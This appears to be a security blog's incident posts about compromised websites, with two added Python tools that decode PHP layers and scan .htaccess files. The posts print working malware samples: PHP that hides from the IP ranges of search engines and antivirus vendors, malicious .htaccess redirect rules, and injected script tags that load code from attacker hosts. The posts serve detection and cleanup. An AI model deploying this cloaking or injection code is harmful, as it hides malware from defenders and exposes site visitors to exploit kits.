While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:
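The eval/gzinflate/base64_decode layering named above can be peeled statically, without running any PHP. This is an added example, not code from the original post; `peel`, `MAX_LAYERS`, `MAX_OUTPUT` and the sample payload are assumptions constructed for illustration.

```python
import base64
import re
import zlib

# Matches eval(gzinflate(base64_decode('...'))); with either quote style.
LAYER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])"
    r"([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?",
    re.IGNORECASE,
)
MAX_LAYERS = 25                 # assumption: stop on pathological nesting
MAX_OUTPUT = 5 * 1024 * 1024    # assumption: cap inflated size per layer


def gzinflate(data):
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header (wbits=-15)."""
    d = zlib.decompressobj(-15)
    out = d.decompress(data, MAX_OUTPUT)
    if d.unconsumed_tail:
        raise ValueError("inflated data exceeds MAX_OUTPUT")
    return out


def peel(source):
    """Return (layers_removed, innermost_source); nothing is ever executed."""
    layers = 0
    while layers < MAX_LAYERS:
        m = LAYER.search(source)
        if not m:
            break
        inner = gzinflate(base64.b64decode(m.group(2))).decode("utf-8", "replace")
        # Splice the decoded text in place of the eval(...) statement.
        source = source[:m.start()] + inner + source[m.end():]
        layers += 1
    return layers, source


def _wrap(php):
    """Build constructed test input: one eval/gzinflate/base64 layer."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = c.compress(php.encode()) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(blob).decode()


# Constructed sample: a harmless echo wrapped twice, as nested droppers often are.
SAMPLE = "<?php " + _wrap(_wrap("echo 'constructed inner payload';")) + " ?>"

if __name__ == "__main__":
    count, plain = peel(SAMPLE)
    print(count, plain)
```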
Flagging google.com as malware
Yesterday we listed www.google.com as being used for .htaccess conditional redirections on hacked sites. Google does no evil, so what happened?
We identified the source of the malware, which looks for certain user agents and IP addresses and redirects the request to www.google.com if it comes from one of them, or to the real malware if not.
This is the code:
$is_bot = FALSE ;
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i',
'#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i',
'#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
// .. (list elided)
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i' ) ;
$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255
"74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255
"65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255,
"74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255
"67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255
"72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255
"38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255
"93\.172\.94\.227", // MacFinder
"212\.100\.250\.218", // Wells Search II
"71\.165\.223\.134",
"70\.91\.180\.25",
"65\.93\.62\.242",
"74\.193\.246\.129",
"193\.164\.202\.166",
"213\.144\.15\.38",
"195\.92\.229\.2",
"70\.50\.189\.191",
"218\.28\.88\.99",
"165\.160\.2\.20",
"89\.122\.224\.230",
"66\.230\.175\.124",
"218\.18\.174\.27",
"65\.33\.87\.94",
"67\.210\.111\.241",
"81\.135\.175\.70",
"64\.69\.34\.134",
"89\.149\.253\.169",
"77\.193\.236\.225",
"84\.155\.170\.196",
"69\.174\.58\.36",
"128\.103\.64\.[0-9]+", // StopBadWare
"150\.70\.[0-9]+\.[0-9]+", // TrendMicro
"216\.104\.[0-9]+\.[0-9]+", // TrendMicro
"207\.46\.[0-9]+\.[0-9]+", // Microsoft
"157\.55\.[0-9]+\.[0-9]+", // Microsoft
"213\.180\.[0-9]+\.[0-9]+", // Yandex
"217\.23\.[0-9]+\.[0-9]+", // Kaspersky
"91\.103\.64\.[0-9]+", // Kaspersky
"215\.5\.80\.[0-9]+", // Kaspersky
"195\.168\.53\.[0-9]+", // NOD32
"117\.198\.48\.54",
"110\.77\.248\.135",
"87\.255\.51\.229",
"206\.248\.243\.130",
"124\.115\.6\.[0-9]+",
"170\.252\.248\.[0-9]+",
"217\.95\.225\.[0-9]+",
"203\.17\.34\.[0-9]+",
"220\.255\.1\.[0-9]+", // domain-tool.com
"69\.28\.58\.[0-9]+", // Symantec
"66\.231\.252\.[0-9]+",
"126\.15\.99\.[0-9]+",
"209\.128\.28\.[0-9]+",
"91\.32\.55\.[0-9]+",
"208\.72\.12\.[0-9]+",
"84\.136\.88\.[0-9]+",
"206\.80\.114\.[0-9]+",
"24\.4\.75\.135",
"66\.147\.244\.[0-9]+", // freepcsecurity.co.uk
"128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu
"209\.9\.239\.[0-9]+", // jsunpack.jeek.org
"62\.67\.194\.[0-9]+", // support.clean-mx.de
"195\.214\.79\.[0-9]+", // support.clean-mx.de
"97\.74\.141\.[0-9]+", // malwareurl.com
"213\.171\.194\.[0-9]+", // spamhaus
"139\.146\.167\.[0-9]+", // malwaredomains
"88\.160\.229\.[0-9]+", // malwaredomains
"69\.162\.79\.[0-9]+", // malwarebytes
"66\.40\.145\.[0-9]+", // bitdefender
"66\.223\.50\.[0-9]+", // bitdefender
"204\.14\.90\.[0-9]+", // spywarewarrior.com
"92\.123\.155\.[0-9]+", // Sophos
"213\.31\.172\.[0-9]+", // Sophos
"143\.215\.130\.[0-9]+", // Malwaredomainlist
"150\.70\.172\.[0-9]+", // TrendNet
"64\.88\.164\.[0-9]+", // AVG
"102\.157\.192\.[0-9]+", // ZeusTracker
"109\.65\.41\.[0-9]+", // ZeusTracker
"110\.77\.248\.[0-9]+", // Virustotal
"59\.6\.145\.[0-9]+", // Virustotal
"67\.124\.37\.[0-9]+", // Virustotal
"80\.190\.117\.[0-9]+", // Virustotal
"202\.190\.74\.[0-9]+", // Virustotal
"209\.160\.33\.[0-9]+", // Virustotal
"91\.121\.139\.[0-9]+", // Virustotal
"85\.87\.104\.[0-9]+", // Virustotal
"96\.50\.0\.[0-9]+", // Virustotal
"220\.225\.0\.52"
);
foreach ( $stop_ips_masks as $k=>$v )
{
if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )
$is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) )
{
header("Location: http://www.google.com/");
die();
}
So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc) and for a few IP addresses for bots and anti virus companies (Trend, Bitdefender, etc). If the requests are coming from them, they ignore the connection and redirect to www.google.com.
That's why we were seeing www.google.com and listed it on our malware dump (already fixed).
For all the other users (the victims), the malware was contacting http://88.198.28.38/api.php?action=link to get the URL to redirect to (generally in the .tk domain). Any questions, let us know.
Strange .htaccess redirections to msn.com
We are seeing something very strange on a few compromised sites lately. Instead of doing .htaccess redirections to malware sites, the attackers added the malware to redirect users to msn.com.
This is what we are seeing on some hacked sites (.htaccess file):
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://msn.com [R=301,L]
# .. lots of empty lines / white spaces ...
ErrorDocument 404 http://msn.com
If you are not familiar with the .htaccess syntax, it is basically redirecting any users coming from search engines (Google, Bing, Yahoo and even Twitter/Facebook) to msn.com instead of going to the real site.
Anyone have ideas? It seems like a bug in the attackers' malware injection code, but we can't say for sure. And no, we do not think Microsoft is behind those (conspiracy theory). 🙂
Malware from thesea.org/media.php
We are seeing many sites compromised with malware from thesea.org/media.php. All sites had the following added to the .htaccess file:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.thesea.org/media.php [R=301,L]
So far we detected more than 500 sites with this type of redirection in the last few days.
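Both the msn.com and thesea.org samples share one shape: a RewriteCond keyed on the visitor's referer, a RewriteRule pointing at another host, and in the msn.com case an ErrorDocument pushed out of sight by blank lines. The scanner below is an added example, not code from the original post; `scan_htaccess`, `BLANK_RUN_THRESHOLD`, the example.com host names and the sample file are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: this many consecutive blank lines counts as deliberate padding.
BLANK_RUN_THRESHOLD = 20
KEYED_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")


def external_host(target, site_hosts):
    """Host of an absolute http(s) target that is not one of the site's own hosts."""
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    host = parts.hostname.lower()
    return None if host in site_hosts else host


def scan_htaccess(text, site_hosts):
    """List redirects to other hosts that fire only for some visitors or on errors."""
    site_hosts = {h.lower() for h in site_hosts}
    findings, pending, blank_run = [], [], 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            blank_run += 1
            continue
        padded, blank_run = blank_run >= BLANK_RUN_THRESHOLD, 0
        tokens = line.split()
        if line.startswith("#") or len(tokens) < 3:
            continue
        directive = tokens[0].lower()
        if directive == "rewritecond":
            # Conditions accumulate and apply to the next RewriteRule only.
            pending.append((tokens[1].upper(), tokens[2]))
        elif directive == "rewriterule":
            conds, pending = pending, []
            host = external_host(tokens[2], site_hosts)
            keyed = [(v, p) for v, p in conds if any(k in v for k in KEYED_VARS)]
            if host and keyed:
                # Count the names in the first (a|b|c) alternation of the pattern.
                m = re.search(r"\(([^()]+)\)", keyed[0][1])
                findings.append({
                    "line": lineno, "kind": "conditional-redirect", "host": host,
                    "keyed_on": keyed[0][0], "after_padding": padded,
                    "names": len(m.group(1).split("|")) if m else 0,
                })
        elif directive == "errordocument":
            host = external_host(tokens[2], site_hosts)
            if host:
                findings.append({"line": lineno, "kind": "errordocument-redirect",
                                 "host": host, "after_padding": padded})
    return findings


# Constructed sample: a benign canonical-host redirect, then the msn.com pattern
# from the post with 200 blank lines hiding the ErrorDocument directive.
SAMPLE = "\n".join([
    "RewriteEngine On",
    r"RewriteCond %{HTTP_HOST} ^example\.com$ [NC]",
    "RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]",
    r"RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|bing)\.(.*)",
    "RewriteRule ^(.*)$ http://msn.com [R=301,L]",
    *([""] * 200),
    "ErrorDocument 404 http://msn.com",
    "ErrorDocument 403 /errors/403.html",
])

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, {"example.com", "www.example.com"}):
        print(finding)
```

The canonical-host redirect on line 3 of the sample is not reported because its target is one of the site's own hosts; pass every host name the site legitimately answers to.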
Malware from paysafecard.name
Seeing many sites compromised with malware from paysafecard.name/analitics.js. This is the js inserted on the hacked pages:
<! --pizda-- ><script type=text/javascript  src= http://paysafecard.name/analitics.js?ftpid=19741></script><!--/pizda-->
Malicious redirections to exploit kits
We talk a lot about sites that get hacked to redirect their users to malicious exploit kits (blackhole, etc). Very often we see encoded javascript and our users ask what it does... These are some of the URLs we saw just this last week being used by the attackers.
Encoded javascript
Interesting redirection from lolotrololo.1dumb.com:
document.write(unescape("<script src = "http://lolotrololo.1dumb.com/n/40">..
Which redirects to http://indefw.bee.pl/info.php?n=40&p=n.